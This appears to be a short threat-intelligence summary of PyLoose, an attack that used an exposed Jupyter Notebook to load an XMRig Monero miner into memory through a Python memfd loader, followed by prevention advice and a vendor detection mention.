PyLoose : Unveiling a New Python-Based Fileless Attack Targeting Cloud Workloads

The attack utilizes a Python script to load an XMRig Miner directly into memory using the memfd technique on Linux. The attack was named PyLoose based on the URL that hosted the Python loader. This is the first reported Python-based fileless attack targeting cloud workloads. The victim in this incident had a publicly accessible Jupyter Notebook service that allowed unrestricted execution of system commands. The attacker downloaded the fileless payload from a Pastebin-equivalent website, avoiding saving the file to the disk. The Python script decoded and decompressed the XMRig miner and loaded it into memory using the memfd feature. The XMRig miner connected to a Monero mining pool.

Fileless attacks are evasive and harder to detect and investigate compared to traditional disk-based attacks. The use of memfd allows the execution of payloads without writing them to disk, making it difficult for security solutions relying on binary scans. The attacker demonstrated sophistication by adapting fileless execution to Python and utilizing an open data-sharing service. Attribution of the attack to a specific threat actor is challenging. Preventive measures include avoiding the public exposure of services like Jupyter Notebook, using strong authentication methods, and restricting the execution of system commands. Wiz provides risk management through host configuration scanning and threat detection through the Runtime Sensor, which can detect fileless threats like PyLoose throughout the attack chain.

Threat Profile:

References:

The following reports contain further technical details:

https://thehackernews.com/2023/07/python-based-pyloose-fileless-attack.htm